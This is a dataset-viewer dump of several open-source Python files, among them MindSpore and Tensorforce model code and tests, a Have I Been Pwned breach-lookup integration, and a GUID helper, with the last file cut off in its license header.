hexsha
stringlengths 40
40
| size
int64 6
782k
| ext
stringclasses 7
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
237
| max_stars_repo_name
stringlengths 6
72
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
list | max_stars_count
int64 1
53k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
184
| max_issues_repo_name
stringlengths 6
72
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
list | max_issues_count
int64 1
27.1k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
184
| max_forks_repo_name
stringlengths 6
72
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
list | max_forks_count
int64 1
12.2k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 6
782k
| avg_line_length
float64 2.75
664k
| max_line_length
int64 5
782k
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8a78745915eb3a4aaf90865a024b4d8bafd46ca7
| 5,151 |
py
|
Python
|
research/gnn/sgcn/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 1 |
2021-11-18T08:17:44.000Z
|
2021-11-18T08:17:44.000Z
|
research/gnn/sgcn/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | null | null | null |
research/gnn/sgcn/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 2 |
2019-09-01T06:17:04.000Z
|
2019-10-04T08:39:45.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
postprocess.
"""
import os
import argparse
import numpy as np
from src.ms_utils import calculate_auc
from mindspore import context, load_checkpoint
def softmax(x):
t_max = np.max(x, axis=1, keepdims=True) # returns max of each row and keeps same dims
e_x = np.exp(x - t_max) # subtracts each row with its max value
t_sum = np.sum(e_x, axis=1, keepdims=True) # returns sum of each row and keeps same dims
f_x = e_x / t_sum
return f_x
def score_model(preds, test_pos, test_neg, weight, bias):
"""
Score the model on the test set edges in each epoch.
Args:
epoch (LongTensor): Training epochs.
Returns:
auc(Float32): AUC result.
f1(Float32): F1-Score result.
"""
score_positive_edges = np.array(test_pos, dtype=np.int32).T
score_negative_edges = np.array(test_neg, dtype=np.int32).T
test_positive_z = np.concatenate((preds[score_positive_edges[0, :], :],
preds[score_positive_edges[1, :], :]), axis=1)
test_negative_z = np.concatenate((preds[score_negative_edges[0, :], :],
preds[score_negative_edges[1, :], :]), axis=1)
# operands could not be broadcast together with shapes (4288,128) (128,3)
scores = np.dot(np.concatenate((test_positive_z, test_negative_z), axis=0), weight) + bias
probability_scores = np.exp(softmax(scores))
predictions = probability_scores[:, 0]/probability_scores[:, 0:2].sum(1)
# predictions = predictions.asnumpy()
targets = [0]*len(test_pos) + [1]*len(test_neg)
auc, f1 = calculate_auc(targets, predictions)
return auc, f1
def get_acc():
"""get infer Accuracy."""
parser = argparse.ArgumentParser(description='postprocess')
parser.add_argument('--dataset_name', type=str, default='bitcoin-otc', choices=['bitcoin-otc', 'bitcoin-alpha'],
help='dataset name')
parser.add_argument('--result_path', type=str, default='./ascend310_infer/input/', help='result Files')
parser.add_argument('--label_path', type=str, default='', help='y_test npy Files')
parser.add_argument('--mask_path', type=str, default='', help='test_mask npy Files')
parser.add_argument("--checkpoint_file", type=str, default='sgcn_alpha_f1.ckpt', help="Checkpoint file path.")
parser.add_argument("--edge_path", nargs="?",
default="./input/bitcoin_alpha.csv", help="Edge list csv.")
parser.add_argument("--features-path", nargs="?",
default="./input/bitcoin_alpha.csv", help="Edge list csv.")
parser.add_argument("--test-size", type=float,
default=0.2, help="Test dataset size. Default is 0.2.")
parser.add_argument("--seed", type=int, default=42,
help="Random seed for sklearn pre-training. Default is 42.")
parser.add_argument("--spectral-features", default=True, dest="spectral_features", action="store_true")
parser.add_argument("--reduction-iterations", type=int,
default=30, help="Number of SVD iterations. Default is 30.")
parser.add_argument("--reduction-dimensions", type=int,
default=64, help="Number of SVD feature extraction dimensions. Default is 64.")
args_opt = parser.parse_args()
# Runtime
context.set_context(mode=context.GRAPH_MODE, device_target='Ascend', device_id=0)
# Create network
test_pos = np.load(os.path.join(args_opt.result_path, 'pos_test.npy'))
test_neg = np.load(os.path.join(args_opt.result_path, 'neg_test.npy'))
# Load parameters from checkpoint into network
param_dict = load_checkpoint(args_opt.checkpoint_file)
print(type(param_dict))
print(param_dict)
print(type(param_dict['regression_weights']))
print(param_dict['regression_weights'])
# load_param_into_net(net, param_dict)
pred = np.fromfile('./result_Files/repos_0.bin', np.float32)
if args_opt.dataset_name == 'bitcoin-otc':
pred = pred.reshape(5881, 64)
else:
pred = pred.reshape(3783, 64)
auc, f1 = score_model(pred, test_pos, test_neg, param_dict['regression_weights'].asnumpy(),
param_dict['regression_bias'].asnumpy())
print("Test set results:", "auc=", "{:.5f}".format(auc), "f1=", "{:.5f}".format(f1))
if __name__ == '__main__':
get_acc()
| 48.140187 | 117 | 0.644729 |
0a10152195fb9a20741a86fb44035860fed300f4
| 12,017 |
py
|
Python
|
Packs/Pwned/Integrations/PwnedV2/PwnedV2.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/Pwned/Integrations/PwnedV2/PwnedV2.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/Pwned/Integrations/PwnedV2/PwnedV2.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
from CommonServerPython import *
''' IMPORTS '''
import re
import requests
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
''' GLOBALS/PARAMS '''
VENDOR = 'Have I Been Pwned? V2'
MAX_RETRY_ALLOWED = demisto.params().get('max_retry_time', -1)
API_KEY = demisto.params().get('api_key')
USE_SSL = not demisto.params().get('insecure', False)
BASE_URL = 'https://haveibeenpwned.com/api/v3'
HEADERS = {
'hibp-api-key': API_KEY,
'user-agent': 'DBOT-API',
'Content-Type': 'application/json',
'Accept': 'application/json'
}
DEFAULT_DBOT_SCORE_EMAIL = 2 if demisto.params().get('default_dbot_score_email') == 'SUSPICIOUS' else 3
DEFAULT_DBOT_SCORE_DOMAIN = 2 if demisto.params().get('default_dbot_score_domain') == 'SUSPICIOUS' else 3
SUFFIXES = {
"email": '/breachedaccount/',
"domain": '/breaches?domain=',
"username": '/breachedaccount/',
"paste": '/pasteaccount/',
"email_truncate_verified": '?truncateResponse=false&includeUnverified=true',
"domain_truncate_verified": '&truncateResponse=false&includeUnverified=true',
"username_truncate_verified": '?truncateResponse=false&includeUnverified=true'
}
RETRIES_END_TIME = datetime.min
''' HELPER FUNCTIONS '''
def http_request(method, url_suffix, params=None, data=None):
while True:
res = requests.request(
method,
BASE_URL + url_suffix,
verify=USE_SSL,
params=params,
data=data,
headers=HEADERS
)
if res.status_code != 429:
# Rate limit response code
break
if datetime.now() > RETRIES_END_TIME:
return_error('Max retry time has exceeded.')
wait_regex = re.search(r'\d+', res.json()['message'])
if wait_regex:
wait_amount = wait_regex.group()
else:
demisto.error('failed extracting wait time will use default (5). Res body: {}'.format(res.text))
wait_amount = 5
if datetime.now() + timedelta(seconds=int(wait_amount)) > RETRIES_END_TIME:
return_error('Max retry time has exceeded.')
time.sleep(int(wait_amount))
if res.status_code == 404:
return None
if not res.status_code == 200:
if not res.status_code == 401:
demisto.error(
'Error in API call to Pwned Integration [%d]. Full text: %s' % (res.status_code, res.text))
return_error('Error in API call to Pwned Integration [%d] - %s' % (res.status_code, res.reason))
return None
return res.json()
def html_description_to_human_readable(breach_description):
"""
Converting from html description to hr
:param breach_description: Description of breach from API response
:return: Description string that altered HTML urls to clickable urls
for better readability in war-room
"""
html_link_pattern = re.compile('<a href="(.+?)"(.+?)>(.+?)</a>')
patterns_found = html_link_pattern.findall(breach_description)
for link in patterns_found:
html_actual_address = link[0]
html_readable_name = link[2]
link_from_desc = '[' + html_readable_name + ']' + '(' + html_actual_address + ')'
breach_description = re.sub(html_link_pattern, link_from_desc, breach_description, count=1)
return breach_description
def data_to_markdown(query_type, query_arg, api_res, api_paste_res=None):
records_found = False
md = '### Have I Been Pwned query for ' + query_type.lower() + ': *' + query_arg + '*\n'
if api_res:
records_found = True
for breach in api_res:
verified_breach = 'Verified' if breach['IsVerified'] else 'Unverified'
md += '#### ' + breach['Title'] + ' (' + breach['Domain'] + '): ' + str(breach['PwnCount']) + \
' records breached [' + verified_breach + ' breach]\n'
md += 'Date: **' + breach['BreachDate'] + '**\n\n'
md += html_description_to_human_readable(breach['Description']) + '\n'
md += 'Data breached: **' + ','.join(breach['DataClasses']) + '**\n'
if api_paste_res:
records_found = True
pastes_list = []
for paste_breach in api_paste_res:
paste_entry = \
{
'Source': paste_breach['Source'],
'Title': paste_breach['Title'],
'ID': paste_breach['Id'],
'Date': '',
'Amount of emails in paste': str(paste_breach['EmailCount'])
}
if paste_breach['Date']:
paste_entry['Date'] = paste_breach['Date'].split('T')[0]
pastes_list.append(paste_entry)
md += tableToMarkdown('The email address was found in the following "Pastes":',
pastes_list,
['ID', 'Title', 'Date', 'Source', 'Amount of emails in paste'])
if not records_found:
md += 'No records found'
return md
def create_dbot_score_dictionary(indicator_value, indicator_type, dbot_score):
return {
'Indicator': indicator_value,
'Type': indicator_type,
'Vendor': VENDOR,
'Score': dbot_score
}
def create_context_entry(context_type, context_main_value, comp_sites, comp_pastes, malicious_score):
context_dict = dict() # dict
if context_type == 'email':
context_dict['Address'] = context_main_value
else:
context_dict['Name'] = context_main_value
context_dict['Pwned-V2'] = {
'Compromised': {
'Vendor': VENDOR,
'Reporters': ', '.join(comp_sites + comp_pastes)
}
}
if malicious_score == 3:
context_dict['Malicious'] = add_malicious_to_context(context_type)
return context_dict
def add_malicious_to_context(malicious_type):
return {
'Vendor': VENDOR,
'Description': 'The ' + malicious_type + ' has been compromised'
}
def email_to_entry_context(email, api_email_res, api_paste_res):
dbot_score = 0
comp_email = dict() # type: dict
comp_sites = sorted([item['Title'] for item in api_email_res])
comp_pastes = sorted(set(item['Source'] for item in api_paste_res))
if len(comp_sites) > 0:
dbot_score = DEFAULT_DBOT_SCORE_EMAIL
email_context = create_context_entry('email', email, comp_sites, comp_pastes, DEFAULT_DBOT_SCORE_EMAIL)
comp_email[outputPaths['email']] = email_context
comp_email['DBotScore'] = create_dbot_score_dictionary(email, 'email', dbot_score)
return comp_email
def domain_to_entry_context(domain, api_res):
comp_sites = [item['Title'] for item in api_res]
comp_sites = sorted(comp_sites)
comp_domain = dict() # type: dict
dbot_score = 0
if len(comp_sites) > 0:
dbot_score = DEFAULT_DBOT_SCORE_DOMAIN
domain_context = create_context_entry('domain', domain, comp_sites, [], DEFAULT_DBOT_SCORE_DOMAIN)
comp_domain[outputPaths['domain']] = domain_context
comp_domain['DBotScore'] = create_dbot_score_dictionary(domain, 'domain', dbot_score)
return comp_domain
def set_retry_end_time():
global RETRIES_END_TIME
if MAX_RETRY_ALLOWED != -1:
RETRIES_END_TIME = datetime.now() + timedelta(seconds=int(MAX_RETRY_ALLOWED))
''' COMMANDS + REQUESTS FUNCTIONS '''
def test_module(args_dict):
"""
If the http request was successful the test will return OK
:return: 3 arrays of outputs
"""
http_request('GET', SUFFIXES.get("username", '') + 'test')
return ['ok'], [None], [None]
def pwned_email_command(args_dict):
"""
Executing the pwned request for emails list, in order to support list input, the function returns 3 lists of outputs
:param args_dict: the demisto argument - in this case the email list is needed
:return: 3 arrays of outputs
"""
email_list = argToList(args_dict.get('email', ''))
api_email_res_list, api_paste_res_list = pwned_email(email_list)
md_list = []
ec_list = []
for email, api_email_res, api_paste_res in zip(email_list, api_email_res_list, api_paste_res_list):
md_list.append(data_to_markdown('Email', email, api_email_res, api_paste_res))
ec_list.append(email_to_entry_context(email, api_email_res or [], api_paste_res or []))
return md_list, ec_list, api_email_res_list
def pwned_email(email_list):
"""
Executing the http requests
:param email_list: the email list that needed for the http requests
:return: 2 arrays of http requests outputs
"""
api_email_res_list = []
api_paste_res_list = []
for email in email_list:
email_suffix = SUFFIXES.get("email") + email + SUFFIXES.get("email_truncate_verified")
paste_suffix = SUFFIXES.get("paste") + email
api_email_res_list.append(http_request('GET', url_suffix=email_suffix))
api_paste_res_list.append(http_request('GET', url_suffix=paste_suffix))
return api_email_res_list, api_paste_res_list
def pwned_domain_command(args_dict):
"""
Executing the pwned request for domains list, in order to support list input, the function returns 3 lists of
outputs
:param args_dict: the demisto argument - in this case the domain list is needed
:return: 3 arrays of outputs
"""
domain_list = argToList(args_dict.get('domain', ''))
api_res_list = pwned_domain(domain_list)
md_list = []
ec_list = []
for domain, api_res in zip(domain_list, api_res_list):
md_list.append(data_to_markdown('Domain', domain, api_res))
ec_list.append(domain_to_entry_context(domain, api_res or []))
return md_list, ec_list, api_res_list
def pwned_domain(domain_list):
"""
Executing the http request
:param domain_list: the domains list that needed for the http requests
:return: an array of http requests outputs
"""
api_res_list = []
for domain in domain_list:
suffix = SUFFIXES.get("domain") + domain + SUFFIXES.get("domain_truncate_verified")
api_res_list.append(http_request('GET', url_suffix=suffix))
return api_res_list
def pwned_username_command(args_dict):
"""
Executing the pwned request for usernames list, in order to support list input, the function returns 3 lists of
outputs
:param args_dict: the demisto argument - in this case the username list is needed
:return: 3 arrays of outputs
"""
username_list = argToList(args_dict.get('username', ''))
api_res_list = pwned_username(username_list)
md_list = []
ec_list = []
for username, api_res in zip(username_list, api_res_list):
md_list.append(data_to_markdown('Username', username, api_res))
ec_list.append(domain_to_entry_context(username, api_res or []))
return md_list, ec_list, api_res_list
def pwned_username(username_list):
"""
Executing the http request
:param username_list: the username list that needed for the http requests
:return: an array of http requests outputs
"""
api_res_list = []
for username in username_list:
suffix = SUFFIXES.get("username") + username + SUFFIXES.get("username_truncate_verified")
api_res_list.append(http_request('GET', url_suffix=suffix))
return api_res_list
command = demisto.command()
LOG('Command being called is: {}'.format(command))
try:
handle_proxy()
set_retry_end_time()
commands = {
'test-module': test_module,
'email': pwned_email_command,
'pwned-email': pwned_email_command,
'domain': pwned_domain_command,
'pwned-domain': pwned_domain_command,
'pwned-username': pwned_username_command
}
if command in commands:
md_list, ec_list, api_email_res_list = commands[command](demisto.args())
for md, ec, api_paste_res in zip(md_list, ec_list, api_email_res_list):
return_outputs(md, ec, api_paste_res)
# Log exceptions
except Exception as e:
return_error(str(e))
| 34.042493 | 120 | 0.659732 |
0a8fdb2b5cc10e441111eda628478417245011ef
| 5,283 |
py
|
Python
|
official/cv/c3d/src/c3d_model.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
official/cv/c3d/src/c3d_model.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
official/cv/c3d/src/c3d_model.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import math
import mindspore.nn as nn
import mindspore.ops as P
from mindspore.common import initializer as init
from src.utils import default_recurisive_init, KaimingNormal
class C3D(nn.Cell):
"""
C3D network definition.
Args:
num_classes (int): Class numbers. Default: 1000.
Returns:
Tensor, infer output tensor.
Examples:
>>> C3D(num_classes=1000)
"""
def __init__(self, num_classes=1000):
super(C3D, self).__init__()
self.conv1 = nn.Conv3d(in_channels=3, out_channels=64, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.pool1 = P.MaxPool3D(kernel_size=(1, 2, 2), strides=(1, 2, 2), pad_mode='same')
self.conv2 = nn.Conv3d(in_channels=64, out_channels=128, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.pool2 = P.MaxPool3D(kernel_size=(2, 2, 2), strides=(2, 2, 2), pad_mode='same')
self.conv3a = nn.Conv3d(in_channels=128, out_channels=256, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.conv3b = nn.Conv3d(in_channels=256, out_channels=256, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.pool3 = P.MaxPool3D(kernel_size=(2, 2, 2), strides=(2, 2, 2), pad_mode='same')
self.conv4a = nn.Conv3d(in_channels=256, out_channels=512, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.conv4b = nn.Conv3d(in_channels=512, out_channels=512, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.pool4 = P.MaxPool3D(kernel_size=(2, 2, 2), strides=(2, 2, 2), pad_mode='same')
self.conv5a = nn.Conv3d(in_channels=512, out_channels=512, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.conv5b = nn.Conv3d(in_channels=512, out_channels=512, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.pool5 = P.MaxPool3D(kernel_size=(2, 2, 2), strides=(2, 2, 2), pad_mode='same')
self.fc6 = nn.Dense(in_channels=8192, out_channels=4096)
self.fc7 = nn.Dense(in_channels=4096, out_channels=4096)
self.fc8 = nn.Dense(in_channels=4096, out_channels=num_classes, bias_init=init.Normal(0.02))
self.dropout = nn.Dropout(keep_prob=0.5)
self.relu = nn.ReLU()
self.pad = nn.Pad(paddings=((0, 0), (0, 0), (1, 0), (1, 0)), mode="CONSTANT")
self.__init_weight()
def __init_weight(self):
default_recurisive_init(self)
self.custom_init_weight()
def construct(self, x):
x = self.relu(self.conv1(x))
x = self.pool1(x)
x = self.relu(self.conv2(x))
x = self.pool2(x)
x = self.relu(self.conv3a(x))
x = self.relu(self.conv3b(x))
x = self.pool3(x)
x = self.relu(self.conv4a(x))
x = self.relu(self.conv4b(x))
x = self.pool4(x)
x = self.relu(self.conv5a(x))
x = self.relu(self.conv5b(x))
x = x.view(-1, 512 * 2, 7, 7)
x = self.pad(x)
x = x.view(-1, 512, 2, 8, 8)
x = self.pool5(x)
x = x.view(-1, 8192)
x = self.relu(self.fc6(x))
x = self.dropout(x)
x = self.relu(self.fc7(x))
x = self.dropout(x)
logits = self.fc8(x)
return logits
def custom_init_weight(self):
"""
Init the weight of Conv3d and Dense in the net.
"""
for _, cell in self.cells_and_names():
if isinstance(cell, nn.Conv3d):
cell.weight.set_data(init.initializer(
KaimingNormal(a=math.sqrt(5), mode='fan_out', nonlinearity='relu'),
cell.weight.shape, cell.weight.dtype))
if cell.bias is not None:
cell.bias.set_data(init.initializer(
'zeros', cell.bias.shape, cell.bias.dtype))
elif isinstance(cell, nn.Dense):
cell.weight.set_data(init.initializer(
init.Normal(0.01), cell.weight.shape, cell.weight.dtype))
if cell.bias is not None:
cell.bias.set_data(init.initializer(
'zeros', cell.bias.shape, cell.bias.dtype))
| 40.638462 | 100 | 0.570509 |
7c2f595fee4e21dc84c6666b03b2174e6d5731e0
| 8,108 |
py
|
Python
|
tensorforce/tests/test_model_save_restore.py
|
gian1312/suchen
|
df863140fd8df1ac2e195cbdfa4756f09f962270
|
[
"Apache-2.0"
] | null | null | null |
tensorforce/tests/test_model_save_restore.py
|
gian1312/suchen
|
df863140fd8df1ac2e195cbdfa4756f09f962270
|
[
"Apache-2.0"
] | null | null | null |
tensorforce/tests/test_model_save_restore.py
|
gian1312/suchen
|
df863140fd8df1ac2e195cbdfa4756f09f962270
|
[
"Apache-2.0"
] | 1 |
2019-11-29T12:28:33.000Z
|
2019-11-29T12:28:33.000Z
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import unittest
import pytest
from tensorforce import TensorForceError
from tensorforce.core.networks import LayeredNetwork
from tensorforce.models import DistributionModel
from tensorforce.tests.minimal_test import MinimalTest
from tensorforce.agents import PPOAgent
from tensorforce.execution import Runner
import tensorflow as tf
import numpy as np
from tensorforce.util import SavableComponent
import os
class SavableNetwork(LayeredNetwork, SavableComponent):
"""
Minimal implementation of a Network that can be saved and restored independently of the Model.
"""
def get_savable_variables(self):
return super(SavableNetwork, self).get_variables(include_nontrainable=False)
def _get_base_variable_scope(self):
return self.apply.variable_scope_name
def create_environment(spec):
return MinimalTest(spec)
def create_agent(environment, network_spec):
return PPOAgent(
update_mode=dict(
unit='episodes',
batch_size=4,
frequency=4
),
memory=dict(
type='latest',
include_next_states=False,
capacity=100
),
step_optimizer=dict(
type='adam',
learning_rate=1e-3
),
subsampling_fraction=0.3,
optimization_steps=20,
states=environment.states,
actions=environment.actions,
network=network_spec
)
class TestModelSaveRestore(unittest.TestCase):
@pytest.fixture(autouse=True)
def initdir(self, tmpdir):
tmpdir.chdir()
self._tmp_dir_path = str(tmpdir)
print("Using %s" % (self._tmp_dir_path, ))
def test_save_restore(self):
environment_spec = {"float": ()}
environment = create_environment(environment_spec)
network_spec = [
dict(type='dense', size=32)
]
agent = create_agent(environment, network_spec)
runner = Runner(agent=agent, environment=environment)
runner.run(episodes=100)
model_values = agent.model.session.run(agent.model.get_variables(
include_submodules=True,
include_nontrainable=False
))
save_path = agent.model.save(directory=self._tmp_dir_path + "/model")
print("Saved at: %s" % (save_path,))
runner.close()
agent = create_agent(environment, network_spec)
agent.model.restore(directory="", file=save_path)
restored_model_values = agent.model.session.run(agent.model.get_variables(
include_submodules=True,
include_nontrainable=False
))
assert len(model_values) == len(restored_model_values)
assert all([np.array_equal(v1, v2) for v1, v2 in zip(model_values, restored_model_values)])
agent.close()
def test_save_network(self):
"""
Test to validate that calls to save and restore of a SavableComponent successfully save and restore the
component's state.
"""
environment_spec = {"float": ()}
environment = create_environment(environment_spec)
network_spec = dict(
type=SavableNetwork,
layers=[dict(type='dense', size=1)]
)
agent = create_agent(environment, network_spec)
assert isinstance(agent.model.network, SavableComponent)
runner = Runner(agent=agent, environment=environment)
runner.run(episodes=100)
network_values = agent.model.session.run(agent.model.network.get_variables())
distribution = next(iter(agent.model.distributions.values()))
distribution_values = agent.model.session.run(distribution.get_variables())
save_path = self._tmp_dir_path + "/network"
agent.model.save_component(component_name=DistributionModel.COMPONENT_NETWORK, save_path=save_path)
runner.close()
assert os.path.isfile(save_path + ".data-00000-of-00001")
assert os.path.isfile(save_path + ".index")
agent = create_agent(environment, network_spec)
agent.model.restore_component(component_name=DistributionModel.COMPONENT_NETWORK, save_path=save_path)
# Ensure only the network variables are loaded
restored_network_values = agent.model.session.run(agent.model.network.get_variables(include_nontrainable=True))
distribution = next(iter(agent.model.distributions.values()))
restored_distribution_values = agent.model.session.run(distribution.get_variables())
assert len(restored_network_values) == len(network_values)
assert all([np.array_equal(v1, v2) for v1, v2 in zip(network_values, restored_network_values)])
assert len(restored_distribution_values) == len(distribution_values)
assert not all([np.array_equal(v1, v2) for v1, v2 in zip(distribution_values, restored_distribution_values)])
agent.close()
environment.close()
def test_pretrain_network(self):
"""
Simulates training outside of Tensorforce and then loading the parameters in the agent's network.
"""
environment_spec = {"float": ()}
environment = create_environment(environment_spec)
size = environment.states["shape"]
output_size = 1
save_path = self._tmp_dir_path + "/network"
g = tf.Graph()
with g.as_default():
x = tf.placeholder(dtype=environment.states["type"], shape=[None, size])
layer = tf.layers.Dense(units=output_size)
y = layer(x)
y_ = tf.placeholder(dtype=environment.states["type"], shape=[None, output_size])
loss = tf.losses.mean_squared_error(y_, y)
optimizer = tf.train.AdamOptimizer(learning_rate=0.1)
train_step = optimizer.minimize(loss)
batch_size = 64
with tf.Session(graph=g) as sess:
sess.run(tf.global_variables_initializer())
for epoch in range(100):
batch = np.random.random([batch_size, size])
correct = np.ones(shape=[batch.shape[0], output_size])
loss_value, _ = sess.run([loss, train_step], {x: batch, y_: correct})
if epoch % 10 == 0:
print("epoch %d: %f" % (epoch, loss_value))
var_map = {
"dense0/apply/linear/apply/W:0": layer.kernel,
"dense0/apply/linear/apply/b:0": layer.bias
}
saver = tf.train.Saver(var_list=var_map)
saver.save(sess=sess, write_meta_graph=False, save_path=save_path)
network_spec = dict(
type=SavableNetwork,
layers=[dict(type='dense', size=output_size)],
)
agent = create_agent(environment, network_spec)
agent.model.restore_component(component_name=agent.model.COMPONENT_NETWORK, save_path=save_path)
agent.close()
def test_non_savable_component(self):
environment_spec = {"float": ()}
environment = create_environment(environment_spec)
network_spec = [dict(type='dense', size=32)]
agent = create_agent(environment, network_spec)
expected_message = "Component network must implement SavableComponent but is "
with pytest.raises(TensorForceError) as excinfo:
agent.model.restore_component(component_name="network", save_path=self._tmp_dir_path + "/network")
assert expected_message in str(excinfo.value)
with pytest.raises(TensorForceError) as excinfo:
agent.model.save_component(component_name="network", save_path=self._tmp_dir_path + "/network")
assert expected_message in str(excinfo.value)
with pytest.raises(TensorForceError) as excinfo:
agent.model.restore_component(component_name="non-existent", save_path=self._tmp_dir_path + "/network")
assert "Component non-existent must implement SavableComponent but is None" == str(excinfo.value)
agent.close()
| 39.940887 | 119 | 0.662309 |
7c2f74f5570ad8ece2d2a501cd63b62951484c2c
| 844 |
py
|
Python
|
guid.py
|
lihuiba/SoftSAN
|
1b8ab2cae92b7aac34211909b27d4ebe595275d7
|
[
"Apache-2.0"
] | 1 |
2015-08-02T09:53:18.000Z
|
2015-08-02T09:53:18.000Z
|
guid.py
|
lihuiba/SoftSAN
|
1b8ab2cae92b7aac34211909b27d4ebe595275d7
|
[
"Apache-2.0"
] | null | null | null |
guid.py
|
lihuiba/SoftSAN
|
1b8ab2cae92b7aac34211909b27d4ebe595275d7
|
[
"Apache-2.0"
] | 2 |
2018-03-21T04:59:50.000Z
|
2019-12-03T15:54:17.000Z
|
import random
import messages_pb2 as msg
def assign(x, y):
x.a=y.a; x.b=y.b; x.c=y.c; x.d=y.d
def isZero(x):
return (x.a==0 and x.b==0 and x.c==0 and x.d==0)
def setZero(x):
x.a=0; x.b=0; x.c=0; x.d=0
def toStr(x):
return "%08x-%08x-%08x-%08x" % (x.a, x.b, x.c, x.d)
def toTuple(x):
return (x.a, x.b, x.c, x.d)
def fromTuple(x):
ret=msg.Guid()
ret.a=x[0]
ret.b=x[1]
ret.c=x[2]
ret.d=x[3]
return ret
def generate(guid=None):
ret=guid or msg.Guid()
ret.a=random.randint(0, 0xffffffff)
ret.b=random.randint(0, 0xffffffff)
ret.c=random.randint(0, 0xffffffff)
ret.d=random.randint(0, 0xffffffff)
return ret
def fromStr(s):
ret=msg.Guid()
s=s.split('-')
ret.a=int(s[0], 16)
ret.b=int(s[1], 16)
ret.c=int(s[2], 16)
ret.d=int(s[3], 16)
return ret
| 19.181818 | 55 | 0.562796 |
861c79331c252b7937573a42f8e033c57c978cd9
| 6,138 |
py
|
Python
|
oneflow/python/test/ops/test_l1loss.py
|
wanghongsheng01/framework_enflame
|
debf613e05e3f5ea8084c3e79b60d0dd9e349526
|
[
"Apache-2.0"
] | 2 |
2021-09-10T00:19:49.000Z
|
2021-11-16T11:27:20.000Z
|
oneflow/python/test/ops/test_l1loss.py
|
duijiudanggecl/oneflow
|
d2096ae14cf847509394a3b717021e2bd1d72f62
|
[
"Apache-2.0"
] | 1 |
2021-06-16T08:37:50.000Z
|
2021-06-16T08:37:50.000Z
|
oneflow/python/test/ops/test_l1loss.py
|
duijiudanggecl/oneflow
|
d2096ae14cf847509394a3b717021e2bd1d72f62
|
[
"Apache-2.0"
] | 1 |
2021-11-10T07:57:01.000Z
|
2021-11-10T07:57:01.000Z
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
